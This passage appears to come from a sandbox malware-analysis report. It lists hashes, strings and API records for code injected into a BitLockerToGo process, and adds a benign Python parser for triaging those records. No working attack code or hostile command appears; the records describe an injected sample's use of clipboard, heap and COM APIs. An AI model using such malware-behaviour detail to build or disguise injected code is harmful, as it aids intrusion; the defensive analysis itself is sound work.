• Opcode ID: edea807f50439cf5337afcd8dfe0e0423d8a8e0a07215f96e39dd2d95f18f18f
• Instruction ID: ebfb86b0fca8f3806296ffbd3cc6be9f2da3a0e17f064d4b41a30f610e239305
• Opcode Fuzzy Hash: edea807f50439cf5337afcd8dfe0e0423d8a8e0a07215f96e39dd2d95f18f18f
• Instruction Fuzzy Hash: 29F0377450C280ABC311EF18E558A1EBBF5EFAA700F15881CE4C48B7A1C3369C24CBA3
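The function records above (control_flow_graph line, APIs, Strings, Memory Dump Source, Similarity hashes) are easier to triage once they are structured: which functions in the region injected into BitLockerToGo at 02CD0000 touch which imported APIs, and which internal calls chain the thin heap wrappers (02D12630, 02D126B0, 02D15520) together. The parser below is an added example, not code from the Joe Sandbox report or its IDA plugin. It assumes the record layout seen on this page (a record ends at its Instruction Fuzzy Hash line, the first block of the control_flow_graph line is the function entry, the dump file name carries the process index and region base), and its input is a constructed excerpt of this page's own records with the long edge lists shortened.

```python
import re

# Constructed input: lines excerpted from this report (the LdrInitializeThunk stub, the
# RtlReAllocateHeap / RtlFreeHeap / RtlAllocateHeap wrappers and one graph-less string
# record), reduced to the fields parsed below; the long edge lists are shortened.
SAMPLE_REPORT = """\
control_flow_graph 512 2d15ad0-2d15b02 LdrInitializeThunk
• LdrInitializeThunk.NTDLL(02D193AD,005C003F,00000006,?,?,00000018,00070605,?,?), ref: 02D15AFE
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
• Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
• Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
control_flow_graph 478 2d15520-2d15534 479 2d155c5-2d155cb call 2d126b0 478->479 484 2d155ac-2d155ad call 2d12630 478->484 489 2d15596-2d155aa RtlReAllocateHeap 481->489 494 2d15570-2d15594 call 2d15a50 490->494
• RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 02D155A4
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
• Opcode ID: fe0edea62908a110ffbc02a74e3a9573de2bb16a84bbc8ce7dc98f17e14ec106
• Instruction Fuzzy Hash: 7B118F7190C250ABD3116F18F808A1FBBF5EF96700F454868E8C487751D33ADC29CBA2
control_flow_graph 498 2d126b0-2d126bf 502 2d12716-2d12723 RtlFreeHeap 499->502 503 2d126f0-2d12714 call 2d159e0 501->503
• RtlFreeHeap.NTDLL(?,00000000), ref: 02D12723
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
• Opcode ID: 2bf6c4b9cc20354fd06ef954e7e0f17fc2aad3b24c23af17b1c48f52166fe663
• Instruction Fuzzy Hash: ADF03C3050C290ABD311AF18E855B0EBBE5EF56700F468C6CE8C49B351C236DC64DBA3
control_flow_graph 506 2d12630-2d12659 507 2d12686-2d1269f RtlAllocateHeap 506->507 509 2d12660-2d12684 call 2d15950 508->509
• RtlAllocateHeap.NTDLL(?,00000000,?), ref: 02D12693
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
• Opcode ID: edea807f50439cf5337afcd8dfe0e0423d8a8e0a07215f96e39dd2d95f18f18f
• Instruction Fuzzy Hash: 29F0377450C280ABC311EF18E558A1EBBF5EFAA700F15881CE4C48B7A1C3369C24CBA3
• String ID: M0O$!k#i$#g;e$%S'Q$,W'U$3{7y$4E:G$4`[b$4`[b$4o)m$6I5K$7w9u
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
• Opcode ID: a2b580ac08e082416257b9bea279cc2cda1769e0652e64f88f61014a0870978f
• Instruction Fuzzy Hash: 92B2A5B4A0071AEFDB54CFA9D8807AAFBB1FF05304F508658E558AB740D731A965CF90
"""

# Field layout below is an assumption drawn from this page, not documented plugin output.
CFG_RE = re.compile(r"^control_flow_graph\s+\d+\s+([0-9a-f]+)-[0-9a-f]+(.*)$")
CALL_RE = re.compile(r"\bcall\s+([0-9a-f]+)")
API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)")
STR_RE = re.compile(r"^•\s*String ID:\s*(.*)$")
SRC_RE = re.compile(r"Source File:\s*([0-9A-F]{8})\.[0-9A-F]{8}\.\d+\.([0-9A-F]{16})\.")
SNAP_RE = re.compile(r"Snapshot File:\s*hcaresult_\d+_\d+_[0-9a-f]+_(.+)\.jbxd")
OPCODE_RE = re.compile(r"Opcode ID:\s*([0-9a-f]{64})")

def new_record():
    return {"entry": None, "callees": [], "apis": [], "strings": [],
            "proc": None, "base": None, "process": None, "opcode_id": None}

def parse_records(text):
    """One dict per function; a record is closed by its 'Instruction Fuzzy Hash' line."""
    records, cur = [], new_record()
    for raw in text.splitlines():
        line = raw.strip()
        if m := CFG_RE.match(line):          # first block is the entry; collect internal 'call' targets
            cur["entry"] = int(m.group(1), 16)
            cur["callees"] = sorted({int(c, 16) for c in CALL_RE.findall(m.group(2))})
        elif m := API_RE.match(line):        # imported API with captured args and call-site address
            cur["apis"].append({"name": m.group(1), "module": m.group(2), "ref": int(m.group(4), 16),
                                "args": [a.strip() for a in m.group(3).split(",")]})
        elif m := STR_RE.match(line):        # '$'-joined list of strings referenced by the function
            cur["strings"] = [s for s in m.group(1).split("$") if s]
        elif m := SRC_RE.search(line):       # dump name: process index, then region base (assumed)
            cur["proc"], cur["base"] = int(m.group(1), 16), int(m.group(2), 16)
        elif m := SNAP_RE.search(line):      # host process of the dumped region
            cur["process"] = m.group(1)
        elif m := OPCODE_RE.search(line):
            cur["opcode_id"] = m.group(1)
        elif line.startswith("• Instruction Fuzzy Hash:"):
            records.append(cur)
            cur = new_record()
    return records

def api_inventory(records):
    """Map 'MODULE!Api' -> sorted entries of the functions that call it directly."""
    inv = {}
    for r in records:
        for a in r["apis"]:
            inv.setdefault(f"{a['module']}!{a['name']}", set()).add(r["entry"])
    return {k: sorted(v) for k, v in inv.items()}

def reachable_apis(records, entry):
    """APIs reachable from `entry` over internal call edges, plus callees the listing lacks."""
    by_entry = {r["entry"]: r for r in records if r["entry"] is not None}
    seen, unresolved, apis, stack = set(), set(), set(), [entry]
    while stack:
        e = stack.pop()
        if e in seen:
            continue
        seen.add(e)
        if e not in by_entry:
            unresolved.add(e)          # called, but no record for it in the parsed listing
            continue
        apis.update(f"{a['module']}!{a['name']}" for a in by_entry[e]["apis"])
        stack.extend(by_entry[e]["callees"])
    return sorted(apis), sorted(unresolved)

if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    for r in recs:
        print(f"proc={r['proc']} {r['process']} entry={r['entry']} apis={[a['name'] for a in r['apis']]}")
    print(reachable_apis(recs, 0x2D15520))
```

Run against the full listing, `reachable_apis` turns the three separate heap records into one statement (02D15520 reaches RtlReAllocateHeap, RtlAllocateHeap and RtlFreeHeap), and the unresolved list names the callees (02D15950, 02D159E0, 02D15A50 here) for which the report shows no record, which is where to look next in the dump. The `opcode_id` field is kept so records can be matched across reports of other samples from the same family.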
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: M0O$!k#i$#g;e$%S'Q$,W'U$3{7y$4E:G$4`[b$4`[b$4o)m$6I5K$7w9u$=K0I$>c8a$?G2E$A3V1$D'$H+e)$I7G5$P?r=$m/U-$/-$31$75$;9$?=
• API String ID: 0-3207955556
• Opcode ID: a2b580ac08e082416257b9bea279cc2cda1769e0652e64f88f61014a0870978f
• Instruction ID: b2111d4abe1b7f9e41ec539ab130723051b6d737957bf3c988fe437b79ca2a5c
• Opcode Fuzzy Hash: a2b580ac08e082416257b9bea279cc2cda1769e0652e64f88f61014a0870978f
• Instruction Fuzzy Hash: 92B2A5B4A0071AEFDB54CFA9D8807AAFBB1FF05304F508658E558AB740D731A965CF90
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: M0O$!k#i$#g;e$%S'Q$,W'U$3{7y$4E:G$4`[b$4`[b$4o)m$6I5K$7w9u$=K0I$>c8a$?G2E$A3V1$D'$H+e)$I7G5$P?r=$m/U-
• API String ID: 0-2826869237
• Opcode ID: d1da7c909d7e0d61e55597d6855325565cef32c52e89dcd7e6d31700a2491e9c
• Instruction ID: 415b0671553f25fcf3636b72e93ccf9f3e89dfe5219915582bc6ee7dcadda9a9
                                                                                                                                                                  • Opcode Fuzzy Hash: d1da7c909d7e0d61e55597d6855325565cef32c52e89dcd7e6d31700a2491e9c
                                                                                                                                                                  • Instruction Fuzzy Hash: B0A2B6B4A00B1AEFDB54CFA5C8807AAFBB1FF45304F508648D569ABB50D731A961CF90
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4G6A$8;$=ChM$E;YE$L3Y=$LO$M?H9$Ok&i$Q#U-$Y'K!$Y7U1$[/Q)$^+A5$a
                                                                                                                                                                  • API String ID: 0-2780120701
                                                                                                                                                                  • Opcode ID: 7c5d1c021a8f0d3cc66f166a26cbe78d40b550030bed94b24922b64b220626e7
                                                                                                                                                                  • Instruction ID: 8f92582c21b124b423bd2fa3a9a2fb8c27bf7b0123b0c42468d5c6ac7a98ef1a
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c5d1c021a8f0d3cc66f166a26cbe78d40b550030bed94b24922b64b220626e7
                                                                                                                                                                  • Instruction Fuzzy Hash: 9B0251B4508340ABD390DF55E980A1FBBF5EB96B48F404A0CF6C99B251D335DA09CBA7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: HINO$L$TWVQ$XY^_$X[ZU$YZ[D$\_^Y$`$`cb}$efg`$hkje$loni$mz$tuz{$twvq$x{zu$Uz:
                                                                                                                                                                  • API String ID: 0-517180400
                                                                                                                                                                  • Opcode ID: b1903a3721a5eb2b0d2e932ddf9028b5b96326746dda2b61e6024911a6f113be
                                                                                                                                                                  • Instruction ID: 1debff6de81554b874fea4698f0d72d6d845d492d442330e15fd39af9972f1c2
                                                                                                                                                                  • Opcode Fuzzy Hash: b1903a3721a5eb2b0d2e932ddf9028b5b96326746dda2b61e6024911a6f113be
                                                                                                                                                                  • Instruction Fuzzy Hash: 5FA256B55083819BEB74CF14C880BAFB7E2EFC5704F14481CE9CA9B690DB75A945CB92
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$Alloc$InitVariant
                                                                                                                                                                  • String ID: 4`[b
                                                                                                                                                                  • API String ID: 3520221836-3962175265
                                                                                                                                                                  • Opcode ID: ac22aff69287e411776988688839ae90e7f2b2ffedc7ae3649575f9741b2bcb5
                                                                                                                                                                  • Instruction ID: c80ccb3fa6f0e00c51aaec014fe0b904c1d7441352eca36ef369c33812571892
                                                                                                                                                                  • Opcode Fuzzy Hash: ac22aff69287e411776988688839ae90e7f2b2ffedc7ae3649575f9741b2bcb5
                                                                                                                                                                  • Instruction Fuzzy Hash: 6422C775A083419FE324DF24D888B6ABBE2FF89305F148D2CE589873A1D735D855CB52
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: ,$2821$4C%E$4`[b$4`[b$?($DG$P?b1$ng{b$p$u
                                                                                                                                                                  • API String ID: 0-2468594515
                                                                                                                                                                  • Opcode ID: dce1df62a96de539ede6107c9299e018ec8190d1799c3f09c7af84f8896ddfc1
                                                                                                                                                                  • Instruction ID: 07e84dbd53402eba4b7b6db0d7f4d5fe96fa35d6d6495bec6cf05b94701d7958
                                                                                                                                                                  • Opcode Fuzzy Hash: dce1df62a96de539ede6107c9299e018ec8190d1799c3f09c7af84f8896ddfc1
                                                                                                                                                                  • Instruction Fuzzy Hash: 839277B55093809FE7708F14D881BEBBBE6EFC9304F04492CE5CA8B251DB759991CB92
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 8M:O$B=_?$H9S;$jXJ-$vA.C$wEtG$Wu
                                                                                                                                                                  • API String ID: 0-3312069854
                                                                                                                                                                  • Opcode ID: 48ad17ebe0d0b4c20741b6ef4244631fe802fba0ebfcf2f7b8d544066fd8cb31
                                                                                                                                                                  • Instruction ID: 0e2b135aa76dcf565992848dfcc862618684d3daa169f130e769c2b6c044ee57
                                                                                                                                                                  • Opcode Fuzzy Hash: 48ad17ebe0d0b4c20741b6ef4244631fe802fba0ebfcf2f7b8d544066fd8cb31
                                                                                                                                                                  • Instruction Fuzzy Hash: 43426A70405B809AD732CF35C494BE3BBE1AF17309F44489DD4EA8B3A2DB39A945DB61
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 8M:O$B=_?$H9S;$jXJ-$vA.C$wEtG$Wu
                                                                                                                                                                  • API String ID: 0-3312069854
                                                                                                                                                                  • Opcode ID: acf84f3abbb1a223aaa97cc516548b4a41299cc3aaf8448e48b432764392612a
                                                                                                                                                                  • Instruction ID: 6304e007cc1515eb3aa0a388be7c1d4bd0acb61f64ff0b5b577153c127897419
                                                                                                                                                                  • Opcode Fuzzy Hash: acf84f3abbb1a223aaa97cc516548b4a41299cc3aaf8448e48b432764392612a
                                                                                                                                                                  • Instruction Fuzzy Hash: 69227A70405B809AD732CF35C498BE3BBE1AF17309F44488CD4EA8B3A2DB39A545DB65
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: -$0$0123456789ABCDEFXP$0123456789abcdefxp$@$gfff$gfff$gfff$gfff
                                                                                                                                                                  • API String ID: 0-1114095000
                                                                                                                                                                  • Opcode ID: 660d8ac1643a69f5efb93db7fc4f09fbca3e3b063dec5d11f79ec1d792dab456
                                                                                                                                                                  • Instruction ID: 9d67154f791efd73f736b30b391a7945001b43ab2f869815accdc4a89811afc5
                                                                                                                                                                  • Opcode Fuzzy Hash: 660d8ac1643a69f5efb93db7fc4f09fbca3e3b063dec5d11f79ec1d792dab456
                                                                                                                                                                  • Instruction Fuzzy Hash: 3DD23D716083918FD718CE29C89036ABBE2AFC5314F08866DE999DB382D775DD05CB93
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: *#1/$8';8$?8$#$K_I\$VPNj$XTJR$YWW\$kwm{$zs
                                                                                                                                                                  • API String ID: 0-1544250960
                                                                                                                                                                  • Opcode ID: caa4b1170c7747c33aa2ea78e9f8896740522c7b286e161fac7a5f90c4e60116
                                                                                                                                                                  • Instruction ID: 2ce2dacc11752a4f8af9b2ca617a69f13184b35a113524532bb2149114ca7a0b
                                                                                                                                                                  • Opcode Fuzzy Hash: caa4b1170c7747c33aa2ea78e9f8896740522c7b286e161fac7a5f90c4e60116
                                                                                                                                                                  • Instruction Fuzzy Hash: E6A162B150C3909BD3228F19C490A2BFFE1AF96744F14895CE5DA8B3A2C335D906CB97
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4`[b$LT$TU$7Wu$YW
                                                                                                                                                                  • API String ID: 0-2131283552
                                                                                                                                                                  • Opcode ID: 8e818ca0d223ae447f2deb6b3f9836376c2f2508e8ffab67bc586ed1fabb8eab
                                                                                                                                                                  • Instruction ID: 41dcff501d060be0fa26fe21e11fb197e45a9d341551556065711dd1a7c404f7
                                                                                                                                                                  • Opcode Fuzzy Hash: 8e818ca0d223ae447f2deb6b3f9836376c2f2508e8ffab67bc586ed1fabb8eab
                                                                                                                                                                  • Instruction Fuzzy Hash: 4CD1BAB4648344DBD350EF14E880A2EBBF5EBA9385F100D2DE6C48B391D335CA55CB92
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 6T^t$Xl&X$|eqz$|n =
                                                                                                                                                                  • API String ID: 0-3902992610
                                                                                                                                                                  • Opcode ID: 265efcb6554ea9aa54b61563c7b21381bea66c16f9e1d22c70d8597c62cfefad
                                                                                                                                                                  • Instruction ID: fad5a80348aeca6c18c38fc7429385539a673901c37492c4339f2b384e944d70
                                                                                                                                                                  • Opcode Fuzzy Hash: 265efcb6554ea9aa54b61563c7b21381bea66c16f9e1d22c70d8597c62cfefad
                                                                                                                                                                  • Instruction Fuzzy Hash: 5D72CD70504B808BD7258F39C4A87A7BBE1AF16308F588C6DD4DB877A2DB35E945CB60
APIs
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
• String ID:
• API String ID: 2832541153-0
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: 0$0$0$@$i
• API String ID: 0-3124195287
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: &]R_$4`[b$4`[b$SdTb$sndW
• API String ID: 0-702967961
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: rr$Q_$US$sq
• API String ID: 0-638576893
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: $$ZhSj$ZhSj$y
• API String ID: 0-982382964
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-3916222277
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: )$)$IEND
• API String ID: 0-588110143
APIs
  • Part of subcall function 02D07DE0: GetSystemMetrics.USER32 ref: 02D07E29
  • Part of subcall function 02D07DE0: GetSystemMetrics.USER32 ref: 02D07E3C
• CoUninitialize.OLE32(?,00000001,00000001,?,?,?,00000001,00000001,00000003,00000001), ref: 02CE26C8
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID: MetricsSystem$Uninitialize
• String ID: #2?
• API String ID: 1128523136-1241500918
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: Inf$NaN
• API String ID: 0-3500518849
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: 4`[b$y'&
• API String ID: 0-3578682820
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: ..9 $2_k
• API String ID: 0-4108207982
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: F\[R$[rsb
• API String ID: 0-4043967235
                                                                                                                                                                  • Opcode ID: 952d60ac5ca20f739180e96449d44868cfd8edf9fe95a1b5dae20aa5cb64f232
                                                                                                                                                                  • Instruction ID: 5381d971890480a9ed4a44627a5dd8e819f3568d731b9cd655c68a79d3877512
                                                                                                                                                                  • Opcode Fuzzy Hash: 952d60ac5ca20f739180e96449d44868cfd8edf9fe95a1b5dae20aa5cb64f232
                                                                                                                                                                  • Instruction Fuzzy Hash: 868135B01002819FDB258F29C490B26BBB1EF56348B24888DD8D68F352D736DA47CFA1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: IK$MO
                                                                                                                                                                  • API String ID: 0-2884483713
                                                                                                                                                                  • Opcode ID: 1a66382b2c942b0ec36bc777c01823e5fca9e1e69b99eed846bafe7066c2b76b
                                                                                                                                                                  • Instruction ID: f37d1ab6085b95a78f6d2d39fcaa123de6e71509698ce1ada053281e5a576a50
                                                                                                                                                                  • Opcode Fuzzy Hash: 1a66382b2c942b0ec36bc777c01823e5fca9e1e69b99eed846bafe7066c2b76b
                                                                                                                                                                  • Instruction Fuzzy Hash: 0271AFB480032ACBCB60CF94C850BBFBBB1FF46355F144949E996AB3A1E334A941CB55
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: )mi${vqa
                                                                                                                                                                  • API String ID: 0-1217653995
                                                                                                                                                                  • Opcode ID: c08d46633766878664ab629f4822a3f67255562f51fd894c5db368fecb394341
                                                                                                                                                                  • Instruction ID: 721dc0f2e08b8d0b10a054dde127295969e58bf26a08074e978012ff4f7d4514
                                                                                                                                                                  • Opcode Fuzzy Hash: c08d46633766878664ab629f4822a3f67255562f51fd894c5db368fecb394341
                                                                                                                                                                  • Instruction Fuzzy Hash: 9D51BB72E007158BDB91CF95C8807EFB7B2EF85310F198928C6956B391D734A945CFA0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4`[b
                                                                                                                                                                  • API String ID: 0-3962175265
                                                                                                                                                                  • Opcode ID: 18a0c6261c139b2dafc8015094fd636db4b40803b83e0d0f4efd97c367c66c94
                                                                                                                                                                  • Instruction ID: 1422ac3dd3807229416d58cc65789d2c3692cfcec6b658006d24c88fb7ff67e0
                                                                                                                                                                  • Opcode Fuzzy Hash: 18a0c6261c139b2dafc8015094fd636db4b40803b83e0d0f4efd97c367c66c94
                                                                                                                                                                  • Instruction Fuzzy Hash: A19275B4A007819FDB358F28D880B26BBF2EF4A304F1449ADD49B87B51E735B955CB90
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
